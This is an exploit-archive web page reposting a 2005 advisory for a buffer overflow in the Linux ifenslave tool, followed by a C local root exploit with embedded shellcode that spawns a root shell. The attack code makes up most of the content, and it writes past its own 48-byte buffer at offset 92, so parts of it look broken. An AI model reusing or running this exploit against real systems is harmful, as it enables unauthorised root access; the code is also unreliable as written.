首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ifenslave Buffer Overflow
来源:www.hackerscenter.com 作者:dcrab 发布时间:2005-08-17  

Ifenslave Buffer Overflow

Summary
ifenslave is "a tool to attach and detach slave network devices to a bonding device. A bonding device will act like a normal Ethernet network device to the kernel, but will send out the packets via the slave devices using a simple round-robin scheduler. This allows for simple load-balancing, identical to "channel bonding" or "trunking" techniques used in switches".

A buffer overflow in ifenslave allows an attacker to run arbitrary code with root privileges on a vulnerable machine.

Credit:
The original article can be found at: http://icis.digitalparadox.org/~dcrab/dc_ifenslave.c

Details
Vulnerable Systems:
* Ifenslave version 2.4 and prior

Exploit Code:
//Diabolic Crab's Local Root Exploit
// /sbin/ifenslave
//dcrab at hackerscenter
//www.hackerscenter.com

#include <stdio.h>
#include <string.h>
#include <unistd.h>

char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid() */
"\xeb\x5a\x5e\x31\xc0\x88\x46\x07\x31\xc0\x31\xdb\xb0\x27\xcd"
"\x80\x85\xc0\x78\x32\x31\xc0\x31\xdb\x66\xb8\x10\x01\xcd\x80"
"\x85\xc0\x75\x0f\x31\xc0\x31\xdb\x50\x8d\x5e\x05\x53\x56\xb0"
"\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89\x5e\x08\x89\x46\x0c\x50"
"\x8d\x4e\x08\x51\x56\xb0\x3b\x50\xcd\x80\x31\xc0\x8d\x1e\x89"
"\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\xe8\xa1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";

int main(int argc,char **argv){
char buf[48];
unsigned long ret;
int i;

char *prog[]={"/sbin/ifenslave",buf,NULL};
char *env[]={"EGG=",shellcode,NULL};

ret=0xc0000000-strlen(shellcode)-strlen(prog[0])-0x06;
printf("use ret addr: 0x%x\n",ret);

memset(buf,0x41,sizeof(buf));
memcpy(&buf[92],&ret,4);

execve(prog[0],prog,env);

}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mdaemon Buffer Overflow
·Microsoft Internet Explorer Ms
·Iwconfig Buffer Overflow
·ZENworks Desktop/Server Manage
·Windows 2000 universal exploit
·CA BrightStor ARCserve Backup
·Novell eDirectory Server iMoni
·MailEnable Authorization: Head
·MDaemon IMAP CRAM-MD5 Authenti
·Yager Game v5.24 Data Block Re
·Novell ZENworks 6.5 Desktop/Se
·Morpheus Information Discloser
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved